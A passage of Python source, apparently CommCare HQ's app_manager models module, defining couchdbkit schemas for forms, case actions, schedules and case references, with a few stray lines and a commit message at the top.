ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)
Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
Added error message to ModuleNotFoundException
# coding=utf-8
from __future__ import absolute_import
from __future__ import unicode_literals
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple, Counter
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from io import BytesIO
import qrcode
from django.utils.safestring import SafeBytes
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from django.utils.translation import ugettext_lazy
from django.db import models
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.app_schemas.case_properties import (
get_all_case_properties,
get_parent_type_map,
get_usercase_properties,
)
from corehq.apps.app_manager.detail_screen import PropertyXpathGenerator
from corehq.apps.integration.models import ApplicationIntegrationMixin
from corehq.apps.linked_domain.applications import get_master_app_version, get_latest_master_app_release
from corehq.apps.app_manager.helpers.validators import (
ApplicationBaseValidator,
ApplicationValidator,
FormValidator,
FormBaseValidator,
IndexedFormBaseValidator,
ModuleValidator,
ModuleBaseValidator,
AdvancedModuleValidator,
AdvancedFormValidator,
ReportModuleValidator,
ShadowFormValidator,
ShadowModuleValidator,
)
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.data_dictionary.util import get_case_property_description_dict
from corehq.apps.linked_domain.exceptions import ActionNotPermitted
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from corehq.apps.userreports.util import get_static_report_mapping
from corehq.apps.users.dbaccessors.couch_users import get_display_name_for_user_id
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.timer import TimingContext, time_method
from corehq.util.timezones.utils import get_timezone_for_domain
from dimagi.ext.couchdbkit import (
BooleanProperty,
DateTimeProperty,
DecimalProperty,
DictProperty,
Document,
DocumentSchema,
FloatProperty,
IntegerProperty,
ListProperty,
SchemaDictProperty,
SchemaListProperty,
SchemaProperty,
StringListProperty,
StringProperty,
)
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.urls import reverse
from django.template.loader import render_to_string
from couchdbkit import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin, CODES
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.apps.app_manager.tasks import prune_auto_generated_builds
from corehq.util.quickcache import quickcache
from corehq.util.soft_assert import soft_assert
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.const import USERCASE_TYPE
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
)
from corehq.apps.builds.utils import get_default_build_spec
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from memoized import memoized
from dimagi.utils.web import get_url_base, parse_int
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import (
ApplicationMediaMixin,
CommCareMultimedia,
FormMediaMixin,
ModuleMediaMixin,
)
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
save_xform,
is_usercase_in_use,
actions_use_usercase,
update_form_unique_ids,
get_correct_app_class,
get_and_assert_practice_user_in_domain,
LatestAppInfo,
update_report_module_ids,
module_offers_search,
get_latest_enabled_build_for_profile,
get_latest_enabled_versions_per_profile,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from corehq.apps.app_manager.exceptions import (
AppEditingError,
FormNotFoundException,
IncompatibleFormTypeException,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
XFormValidationFailed,
PracticeUserException)
from corehq.apps.reports.daterange import get_daterange_start_end_dates, get_simple_dateranges
from jsonpath_rw import jsonpath, parse
import six
from six.moves import filter
from six.moves import range
from six.moves import map
from io import open
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
FIELD_SEPARATOR = ':'
ATTACHMENT_REGEX = r'[^/]*\.xml'
ANDROID_LOGO_PROPERTY_MAPPING = {
'hq_logo_android_home': 'brand-banner-home',
'hq_logo_android_login': 'brand-banner-login',
'hq_logo_android_demo': 'brand-banner-home-demo',
}
LATEST_APK_VALUE = 'latest'
LATEST_APP_VALUE = 0
_soft_assert = soft_assert(to="{}@{}.com".format('npellegrino', 'dimagi'), exponential_backoff=True)
def jsonpath_update(datum_context, value):
field = datum_context.path.fields[0]
parent = jsonpath.Parent().find(datum_context)[0]
parent.value[field] = value
# store a list of references to form ID's so that
# when an app is copied we can update the references
# with the new values
form_id_references = []
def FormIdProperty(expression, **kwargs):
"""
Create a StringProperty that references a form ID. This is necessary because
form IDs change when apps are copied so we need to make sure we update
any references to the them.
:param expression: jsonpath expression that can be used to find the field
:param kwargs: arguments to be passed to the underlying StringProperty
"""
path_expression = parse(expression)
assert isinstance(path_expression, jsonpath.Child), "only child path expressions are supported"
field = path_expression.right
assert len(field.fields) == 1, 'path expression can only reference a single field'
form_id_references.append(path_expression)
return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
def app_template_dir(slug):
return os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'template_apps', slug)
@memoized
def load_app_template(slug):
with open(os.path.join(app_template_dir(slug), 'app.json')) as f:
return json.load(f)
class IndexedSchema(DocumentSchema):
"""
Abstract class.
Meant for documents that appear in a list within another document
and need to know their own position within that list.
"""
def with_id(self, i, parent):
self._i = i
self._parent = parent
return self
@property
def id(self):
return self._i
def __eq__(self, other):
return (
other and isinstance(other, IndexedSchema)
and (self.id == other.id)
and (self._parent == other._parent)
)
class Getter(object):
def __init__(self, attr):
self.attr = attr
def __call__(self, instance):
items = getattr(instance, self.attr)
l = len(items)
for i, item in enumerate(items):
yield item.with_id(i % l, instance)
def __get__(self, instance, owner):
# thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
# this makes Getter('foo') act like a bound method
return types.MethodType(self, instance)
class FormActionCondition(DocumentSchema):
"""
The condition under which to open/update/close a case/referral
Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
in which case the action takes place if question has answer answer,
or {'type': 'always'} in which case the action always takes place.
"""
type = StringProperty(choices=["if", "always", "never"], default="never")
question = StringProperty()
answer = StringProperty()
operator = StringProperty(choices=['=', 'selected', 'boolean_true'], default='=')
def is_active(self):
return self.type in ('if', 'always')
class FormAction(DocumentSchema):
"""
Corresponds to Case XML
"""
condition = SchemaProperty(FormActionCondition)
def is_active(self):
return self.condition.is_active()
@classmethod
def get_action_paths(cls, action):
if action.condition.type == 'if':
yield action.condition.question
for __, path in cls.get_action_properties(action):
yield path
@classmethod
def get_action_properties(self, action):
action_properties = action.properties()
if 'name_path' in action_properties and action.name_path:
yield 'name', action.name_path
if 'case_name' in action_properties:
yield 'name', action.case_name
if 'external_id' in action_properties and action.external_id:
yield 'external_id', action.external_id
if 'update' in action_properties:
for name, path in action.update.items():
yield name, path
if 'case_properties' in action_properties:
for name, path in action.case_properties.items():
yield name, path
if 'preload' in action_properties:
for path, name in action.preload.items():
yield name, path
class UpdateCaseAction(FormAction):
update = DictProperty()
class PreloadAction(FormAction):
preload = DictProperty()
def is_active(self):
return bool(self.preload)
class UpdateReferralAction(FormAction):
followup_date = StringProperty()
def get_followup_date(self):
if self.followup_date:
return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
followup_date=self.followup_date,
)
return self.followup_date or "date(today() + 2)"
class OpenReferralAction(UpdateReferralAction):
name_path = StringProperty()
class OpenCaseAction(FormAction):
name_path = StringProperty()
external_id = StringProperty()
class OpenSubCaseAction(FormAction, IndexedSchema):
case_type = StringProperty()
case_name = StringProperty()
reference_id = StringProperty()
case_properties = DictProperty()
repeat_context = StringProperty()
# relationship = "child" for index to a parent case (default)
# relationship = "extension" for index to a host case
relationship = StringProperty(choices=['child', 'extension'], default='child')
close_condition = SchemaProperty(FormActionCondition)
@property
def form_element_name(self):
return 'subcase_{}'.format(self.id)
class FormActions(DocumentSchema):
open_case = SchemaProperty(OpenCaseAction)
update_case = SchemaProperty(UpdateCaseAction)
close_case = SchemaProperty(FormAction)
open_referral = SchemaProperty(OpenReferralAction)
update_referral = SchemaProperty(UpdateReferralAction)
close_referral = SchemaProperty(FormAction)
case_preload = SchemaProperty(PreloadAction)
referral_preload = SchemaProperty(PreloadAction)
load_from_form = SchemaProperty(PreloadAction) # DEPRECATED
usercase_update = SchemaProperty(UpdateCaseAction)
usercase_preload = SchemaProperty(PreloadAction)
subcases = SchemaListProperty(OpenSubCaseAction)
get_subcases = IndexedSchema.Getter('subcases')
def all_property_names(self):
names = set()
names.update(list(self.update_case.update.keys()))
names.update(list(self.case_preload.preload.values()))
for subcase in self.subcases:
names.update(list(subcase.case_properties.keys()))
return names
def count_subcases_per_repeat_context(self):
return Counter([action.repeat_context for action in self.subcases])
class CaseIndex(DocumentSchema):
tag = StringProperty()
reference_id = StringProperty(default='parent')
relationship = StringProperty(choices=['child', 'extension', 'question'], default='child')
# if relationship is 'question', this is the question path
# question's response must be either "child" or "extension"
relationship_question = StringProperty(default='')
class AdvancedAction(IndexedSchema):
case_type = StringProperty()
case_tag = StringProperty()
case_properties = DictProperty()
# case_indices = NotImplemented
close_condition = SchemaProperty(FormActionCondition)
__eq__ = DocumentSchema.__eq__
def get_paths(self):
for path in self.case_properties.values():
yield path
if self.close_condition.type == 'if':
yield self.close_condition.question
def get_property_names(self):
return set(self.case_properties.keys())
@property
def is_subcase(self):
return bool(self.case_indices)
@property
def form_element_name(self):
return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
"""
Configuration for auto-selecting a case.
Attributes:
value_source Reference to the source of the value. For mode = fixture,
this represents the FixtureDataType ID. For mode = case
this represents the 'case_tag' for the case.
The modes 'user' and 'raw' don't require a value_source.
value_key The actual field that contains the case ID. Can be a case
index or a user data key or a fixture field name or the raw
xpath expression.
"""
mode = StringProperty(choices=[AUTO_SELECT_USER,
AUTO_SELECT_FIXTURE,
AUTO_SELECT_CASE,
AUTO_SELECT_USERCASE,
AUTO_SELECT_RAW])
value_source = StringProperty()
value_key = StringProperty(required=True)
class LoadCaseFromFixture(DocumentSchema):
"""
fixture_nodeset: nodeset that returns the fixture options to display
fixture_tag: id of session datum where the result of user selection will be stored
fixture_variable: value from the fixture to store from the selection
auto_select_fixture: boolean to autoselect the value if the nodeset only returns 1 result
case_property: case property to filter on
arbitrary_datum_*: adds an arbitrary datum with function before the action
"""
fixture_nodeset = StringProperty()
fixture_tag = StringProperty()
fixture_variable = StringProperty()
auto_select_fixture = BooleanProperty(default=False)
case_property = StringProperty(default='')
auto_select = BooleanProperty(default=False)
arbitrary_datum_id = StringProperty()
arbitrary_datum_function = StringProperty()
class LoadUpdateAction(AdvancedAction):
"""
details_module: Use the case list configuration from this module to show the cases.
preload: Value from the case to load into the form. Keys are question paths,
values are case properties.
auto_select: Configuration for auto-selecting the case
load_case_from_fixture: Configuration for loading a case using fixture data
show_product_stock: If True list the product stock using the module's Product List
configuration.
product_program: Only show products for this CommCare Supply program.
case_index: Used when a case should be created/updated as a child or extension case
of another case.
"""
details_module = StringProperty()
preload = DictProperty()
auto_select = SchemaProperty(AutoSelectCase, default=None)
load_case_from_fixture = SchemaProperty(LoadCaseFromFixture, default=None)
show_product_stock = BooleanProperty(default=False)
product_program = StringProperty()
case_index = SchemaProperty(CaseIndex)
@property
def case_indices(self):
# Allows us to ducktype AdvancedOpenCaseAction
return [self.case_index] if self.case_index.tag else []
@case_indices.setter
def case_indices(self, value):
if len(value) > 1:
raise ValueError('A LoadUpdateAction cannot have more than one case index')
if value:
self.case_index = value[0]
else:
self.case_index = CaseIndex()
@case_indices.deleter
def case_indices(self):
self.case_index = CaseIndex()
def get_paths(self):
for path in super(LoadUpdateAction, self).get_paths():
yield path
for path in self.preload.keys():
yield path
def get_property_names(self):
names = super(LoadUpdateAction, self).get_property_names()
names.update(list(self.preload.values()))
return names
@property
def case_session_var(self):
return 'case_id_{0}'.format(self.case_tag)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
data['case_index'] = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
name_path = StringProperty()
repeat_context = StringProperty()
case_indices = SchemaListProperty(CaseIndex)
open_condition = SchemaProperty(FormActionCondition)
def get_paths(self):
for path in super(AdvancedOpenCaseAction, self).get_paths():
yield path
yield self.name_path
if self.open_condition.type == 'if':
yield self.open_condition.question
@property
def case_session_var(self):
return 'case_id_new_{}_{}'.format(self.case_type, self.id)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
index = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
if hasattr(data.get('case_indices'), 'append'):
data['case_indices'].append(index)
else:
data['case_indices'] = [index]
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
load_update_cases = SchemaListProperty(LoadUpdateAction)
open_cases = SchemaListProperty(AdvancedOpenCaseAction)
get_load_update_actions = IndexedSchema.Getter('load_update_cases')
get_open_actions = IndexedSchema.Getter('open_cases')
def get_all_actions(self):
return itertools.chain(self.get_load_update_actions(), self.get_open_actions())
def get_subcase_actions(self):
return (a for a in self.get_all_actions() if a.case_indices)
def get_open_subcase_actions(self, parent_case_type=None):
for action in self.open_cases:
if action.case_indices:
if not parent_case_type:
yield action
else:
if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
for case_index in action.case_indices):
yield action
def get_case_tags(self):
for action in self.get_all_actions():
yield action.case_tag
def get_action_from_tag(self, tag):
return self.actions_meta_by_tag.get(tag, {}).get('action', None)
@property
def actions_meta_by_tag(self):
return self._action_meta()['by_tag']
@property
def actions_meta_by_parent_tag(self):
return self._action_meta()['by_parent_tag']
@property
def auto_select_actions(self):
return self._action_meta()['by_auto_select_mode']
@memoized
def _action_meta(self):
meta = {
'by_tag': {},
'by_parent_tag': {},
'by_auto_select_mode': {
AUTO_SELECT_USER: [],
AUTO_SELECT_CASE: [],
AUTO_SELECT_FIXTURE: [],
AUTO_SELECT_USERCASE: [],
AUTO_SELECT_RAW: [],
}
}
def add_actions(type, action_list):
for action in action_list:
meta['by_tag'][action.case_tag] = {
'type': type,
'action': action
}
for parent in action.case_indices:
meta['by_parent_tag'][parent.tag] = {
'type': type,
'action': action
}
if type == 'load' and action.auto_select and action.auto_select.mode:
meta['by_auto_select_mode'][action.auto_select.mode].append(action)
add_actions('load', self.get_load_update_actions())
add_actions('open', self.get_open_actions())
return meta
def count_subcases_per_repeat_context(self):
return Counter([action.repeat_context for action in self.get_open_subcase_actions()])
class FormSource(object):
def __get__(self, form, form_cls):
if not form:
return self
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
# for backwards compatibility of really old apps
try:
old_contents = form['contents']
except AttributeError:
pass
else:
app.lazy_put_attachment(old_contents.encode('utf-8'), filename)
del form['contents']
if not app.has_attachment(filename):
source = ''
else:
source = app.lazy_fetch_attachment(filename)
if isinstance(source, bytes):
source = source.decode('utf-8')
else:
_soft_assert(False, type(source))
return source
def __set__(self, form, value):
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
if isinstance(value, six.text_type):
value = value.encode('utf-8')
else:
_soft_assert(False, type(value))
app.lazy_put_attachment(value, filename)
form.clear_validation_cache()
try:
form.xmlns = form.wrapped_xform().data_node.tag_xmlns
except Exception:
form.xmlns = None
class CachedStringProperty(object):
def __init__(self, key):
self.get_key = key
def __get__(self, instance, owner):
return self.get(self.get_key(instance))
def __set__(self, instance, value):
self.set(self.get_key(instance), value)
@classmethod
def get(cls, key):
return cache.get(key)
@classmethod
def set(cls, key, value):
cache.set(key, value, 7*24*60*60) # cache for 7 days
class ScheduleVisit(IndexedSchema):
"""
due: Days after the anchor date that this visit is due
starts: Days before the due date that this visit is valid from
expires: Days after the due date that this visit is valid until (optional)
repeats: Whether this is a repeat visit (one per form allowed)
increment: Days after the last visit that the repeat visit occurs
"""
due = IntegerProperty()
starts = IntegerProperty()
expires = IntegerProperty()
repeats = BooleanProperty(default=False)
increment = IntegerProperty()
@property
def id(self):
"""Visits are 1-based indexed"""
_id = super(ScheduleVisit, self).id
return _id + 1
class FormDatum(DocumentSchema):
name = StringProperty()
xpath = StringProperty()
class FormLink(DocumentSchema):
"""
xpath: xpath condition that must be true in order to open next form
form_id: id of next form to open
"""
xpath = StringProperty()
form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
"""
starts: Days after the anchor date that this schedule starts
expires: Days after the anchor date that this schedule expires (optional)
visits: List of visits in this schedule
allow_unscheduled: Allow unscheduled visits in this schedule
transition_condition: Condition under which we transition to the next phase
termination_condition: Condition under which we terminate the whole schedule
"""
enabled = BooleanProperty(default=True)
starts = IntegerProperty()
expires = IntegerProperty()
allow_unscheduled = BooleanProperty(default=False)
visits = SchemaListProperty(ScheduleVisit)
get_visits = IndexedSchema.Getter('visits')
transition_condition = SchemaProperty(FormActionCondition)
termination_condition = SchemaProperty(FormActionCondition)
class CustomAssertion(DocumentSchema):
"""Custom assertions to add to the assertions block
test: The actual assertion to run
locale_id: The id of the localizable string
"""
test = StringProperty(required=True)
text = DictProperty(StringProperty)
class CustomInstance(DocumentSchema):
"""Custom instances to add to the instance block
instance_id: The ID of the instance
instance_path: The path where the instance can be found
"""
instance_id = StringProperty(required=True)
instance_path = StringProperty(required=True)
class CommentMixin(DocumentSchema):
"""
Documentation comment for app builders and maintainers
"""
comment = StringProperty(default='')
@property
def short_comment(self):
"""
Trim comment to 500 chars (about 100 words)
"""
return self.comment if len(self.comment) <= 500 else self.comment[:497] + '...'
class CaseLoadReference(DocumentSchema):
"""
This is the schema for a load reference that is used in validation and expected
to be worked with when using `CaseReferences`. The format is different from the
dict of:
{
'path': ['list', 'of', 'properties']
}
That is stored on the model and expected in Vellum, but as we add more information
(like case types) to the load model this format will be easier to extend.
"""
_allow_dynamic_properties = False
path = StringProperty()
properties = ListProperty(six.text_type)
class CaseSaveReference(DocumentSchema):
"""
This is the schema for what Vellum writes to HQ and what is expected to be stored on the
model (reference by a dict where the keys are paths).
"""
_allow_dynamic_properties = False
case_type = StringProperty()
properties = ListProperty(six.text_type)
create = BooleanProperty(default=False)
close = BooleanProperty(default=False)
class CaseSaveReferenceWithPath(CaseSaveReference):
"""
Like CaseLoadReference, this is the model that is expected to be worked with as it
contains the complete information about the reference in a single place.
"""
path = StringProperty()
class CaseReferences(DocumentSchema):
"""
The case references associated with a form. This is dependent on Vellum's API that sends
case references to HQ.
load: is a dict of question paths to lists of properties (see `CaseLoadReference`),
save: is a dict of question paths to `CaseSaveReference` objects.
The intention is that all usage of the objects goes through the `get_load_references` and
`get_save_references` helper functions.
"""
_allow_dynamic_properties = False
load = DictProperty()
save = SchemaDictProperty(CaseSaveReference)
def validate(self, required=True):
super(CaseReferences, self).validate()
# call this method to force validation to run on the other referenced types
# since load is not a defined schema (yet)
list(self.get_load_references())
def get_load_references(self):
"""
Returns a generator of `CaseLoadReference` objects containing all the load references.
"""
for path, properties in self.load.items():
yield CaseLoadReference(path=path, properties=list(properties))
def get_save_references(self):
"""
Returns a generator of `CaseSaveReferenceWithPath` objects containing all the save references.
"""
for path, reference in self.save.items():
ref_copy = reference.to_json()
ref_copy['path'] = path
yield CaseSaveReferenceWithPath.wrap(ref_copy)
class FormBase(DocumentSchema):
"""
Part of a Managed Application; configuration for a form.
Translates to a second-level menu on the phone
"""
form_type = None
name = DictProperty(six.text_type)
unique_id = StringProperty()
show_count = BooleanProperty(default=False)
xmlns = StringProperty()
version = IntegerProperty()
source = FormSource()
validation_cache = CachedStringProperty(
lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
)
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=ALL_WORKFLOWS
)
post_form_workflow_fallback = StringProperty(
choices=WORKFLOW_FALLBACK_OPTIONS,
default=None,
)
auto_gps_capture = BooleanProperty(default=False)
no_vellum = BooleanProperty(default=False)
form_links = SchemaListProperty(FormLink)
schedule_form_id = StringProperty()
custom_assertions = SchemaListProperty(CustomAssertion)
custom_instances = SchemaListProperty(CustomInstance)
case_references_data = SchemaProperty(CaseReferences)
is_release_notes_form = BooleanProperty(default=False)
enable_release_notes = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
data.pop('validation_cache', '')
if cls is FormBase:
doc_type = data['doc_type']
if doc_type == 'Form':
return Form.wrap(data)
elif doc_type == 'AdvancedForm':
return AdvancedForm.wrap(data)
elif doc_type == 'ShadowForm':
return ShadowForm.wrap(data)
else:
raise ValueError('Unexpected doc_type for Form', doc_type)
else:
return super(FormBase, cls).wrap(data)
@property
def case_references(self):
return self.case_references_data or CaseReferences()
def requires_case(self):
return False
def get_action_type(self):
return ''
def get_validation_cache(self):
return self.validation_cache
def set_validation_cache(self, cache):
self.validation_cache = cache
def clear_validation_cache(self):
self.set_validation_cache(None)
@property
def validator(self):
return FormBaseValidator(self)
def is_allowed_to_be_release_notes_form(self):
# checks if this form can be marked as a release_notes form
# based on whether it belongs to a training_module
# and if no other form is already marked as release_notes form
module = self.get_module()
if not module or not module.is_training_module:
return False
forms = module.get_forms()
for form in forms:
if form.is_release_notes_form and form.unique_id != self.unique_id:
return False
return True
@property
def uses_cases(self):
return (
self.requires_case()
or self.get_action_type() != 'none'
or self.form_type == 'advanced_form'
)
@case_references.setter
def case_references(self, case_references):
self.case_references_data = case_references
@classmethod
def get_form(cls, form_unique_id, and_app=False):
try:
d = Application.get_db().view(
'app_manager/xforms_index',
key=form_unique_id
).one()
except MultipleResultsFound as e:
raise XFormIdNotUnique(
"xform id '%s' not unique: %s" % (form_unique_id, e)
)
if d:
d = d['value']
else:
raise ResourceNotFound()
# unpack the dict into variables app_id, module_id, form_id
app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
app = Application.get(app_id)
form = app.get_form(unique_id)
if and_app:
return form, app
else:
return form
def pre_delete_hook(self):
raise NotImplementedError()
def pre_move_hook(self, from_module, to_module):
""" Called before a form is moved between modules or to a different position """
raise NotImplementedError()
def wrapped_xform(self):
return XForm(self.source)
def validate_form(self):
vc = self.get_validation_cache()
if vc is None:
# todo: now that we don't use formtranslate, does this still apply?
# formtranslate requires all attributes to be valid xpaths, but
# vellum namespaced attributes aren't
form = self.wrapped_xform()
form.strip_vellum_ns_attributes()
try:
if form.xml is not None:
validate_xform(self.get_app().domain, etree.tostring(form.xml))
except XFormValidationError as e:
validation_dict = {
"fatal_error": e.fatal_error,
"validation_problems": e.validation_problems,
"version": e.version,
}
vc = json.dumps(validation_dict)
else:
vc = ""
self.set_validation_cache(vc)
if vc:
try:
raise XFormValidationError(**json.loads(vc))
except ValueError:
self.clear_validation_cache()
return self.validate_form()
return self
def is_a_disabled_release_form(self):
return self.is_release_notes_form and not self.enable_release_notes
@property
def timing_context(self):
return self.get_app().timing_context
def validate_for_build(self, validate_module=True):
return self.validator.validate_for_build(validate_module)
def get_unique_id(self):
"""
Return unique_id if it exists, otherwise initialize it
Does _not_ force a save, so it's the caller's responsibility to save the app
"""
if not self.unique_id:
self.unique_id = uuid.uuid4().hex
return self.unique_id
def get_app(self):
return self._app
def get_version(self):
return self.version if self.version else self.get_app().version
def add_stuff_to_xform(self, xform, build_profile_id=None):
app = self.get_app()
langs = app.get_build_langs(build_profile_id)
xform.exclude_languages(langs)
xform.set_default_language(langs[0])
xform.normalize_itext()
xform.strip_vellum_ns_attributes()
xform.set_version(self.get_version())
xform.add_missing_instances(app.domain)
def render_xform(self, build_profile_id=None):
xform = XForm(self.source)
self.add_stuff_to_xform(xform, build_profile_id)
return xform.render()
def cached_get_questions(self):
"""
Call to get_questions with a superset of necessary information, so
it can hit the same cache across common app-building workflows
"""
# it is important that this is called with the same params every time
return self.get_questions([], include_triggers=True, include_groups=True)
@time_method()
@quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'],
timeout=24 * 60 * 60)
def get_questions(self, langs, include_triggers=False,
include_groups=False, include_translations=False):
try:
return XForm(self.source).get_questions(
langs=langs,
include_triggers=include_triggers,
include_groups=include_groups,
include_translations=include_translations,
)
except XFormException as e:
raise XFormException(_('Error in form "{}": {}')
.format(trans(self.name), six.text_type(e)))
@memoized
def get_case_property_name_formatter(self):
"""Get a function that formats case property names
The returned function requires two arguments
`(case_property_name, data_path)` and returns a string.
"""
valid_paths = {}
if toggles.MM_CASE_PROPERTIES.enabled(self.get_app().domain):
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[])}
except XFormException:
# punt on invalid xml (sorry, no rich attachments)
valid_paths = {}
def format_key(key, path):
if valid_paths.get(path) == "upload":
return "{}{}".format(ATTACHMENT_PREFIX, key)
return key
return format_key
def export_json(self, dump_json=True):
source = self.to_json()
del source['unique_id']
return json.dumps(source) if dump_json else source
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
try:
self.rename_xform_language(old_lang, new_lang)
except XFormException:
pass
def rename_xform_language(self, old_code, new_code):
source = XForm(self.source)
if source.exists():
source.rename_language(old_code, new_code)
self.source = source.render().decode('utf-8')
def default_name(self):
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
@property
def full_path_name(self):
return "%(app_name)s > %(module_name)s > %(form_name)s" % {
'app_name': self.get_app().name,
'module_name': self.get_module().default_name(),
'form_name': self.default_name()
}
@property
def has_fixtures(self):
return 'src="jr://fixture/item-list:' in self.source
def get_auto_gps_capture(self):
app = self.get_app()
if app.build_version and app.enable_auto_gps:
return self.auto_gps_capture or app.auto_gps_capture
else:
return False
def is_registration_form(self, case_type=None):
"""
Should return True if this form passes the following tests:
* does not require a case
* registers a case of type 'case_type' if supplied
"""
raise NotImplementedError()
def uses_usercase(self):
raise NotImplementedError()
def update_app_case_meta(self, app_case_meta):
pass
@property
@memoized
def case_list_modules(self):
case_list_modules = [
mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
]
return case_list_modules
@property
def is_case_list_form(self):
return bool(self.case_list_modules)
def get_save_to_case_updates(self):
"""
Get a flat list of case property names from save to case questions
"""
updates_by_case_type = defaultdict(set)
for save_to_case_update in self.case_references_data.get_save_references():
case_type = save_to_case_update.case_type
updates_by_case_type[case_type].update(save_to_case_update.properties)
return updates_by_case_type
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
def get_app(self):
return self._parent._parent
def get_module(self):
return self._parent
def get_case_type(self):
return self._parent.case_type
@property
def validator(self):
return IndexedFormBaseValidator(self)
def _add_save_to_case_questions(self, form_questions, app_case_meta):
def _make_save_to_case_question(path):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
# todo: this is a hack - just make an approximate save-to-case looking question
return FormQuestionResponse.wrap({
"label": path,
"tag": path,
"value": path,
"repeat": None,
"group": None,
"type": 'SaveToCase',
"relevant": None,
"required": None,
"comment": None,
"hashtagValue": path,
})
def _make_dummy_condition():
# todo: eventually would be nice to support proper relevancy conditions here but that's a ways off
return FormActionCondition(type='always')
for property_info in self.case_references_data.get_save_references():
if property_info.case_type:
type_meta = app_case_meta.get_type(property_info.case_type)
for property_name in property_info.properties:
app_case_meta.add_property_save(
property_info.case_type,
property_name,
self.unique_id,
_make_save_to_case_question(property_info.path),
None
)
if property_info.create:
type_meta.add_opener(self.unique_id, _make_dummy_condition())
if property_info.close:
type_meta.add_closer(self.unique_id, _make_dummy_condition())
def add_property_save(self, app_case_meta, case_type, name,
questions, question_path, condition=None):
if question_path in questions:
app_case_meta.add_property_save(
case_type,
name,
self.unique_id,
questions[question_path],
condition
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
def add_property_load(self, app_case_meta, case_type, name,
questions, question_path):
if question_path in questions:
app_case_meta.add_property_load(
case_type,
name,
self.unique_id,
questions[question_path]
)
else:
app_case_meta.add_property_error(
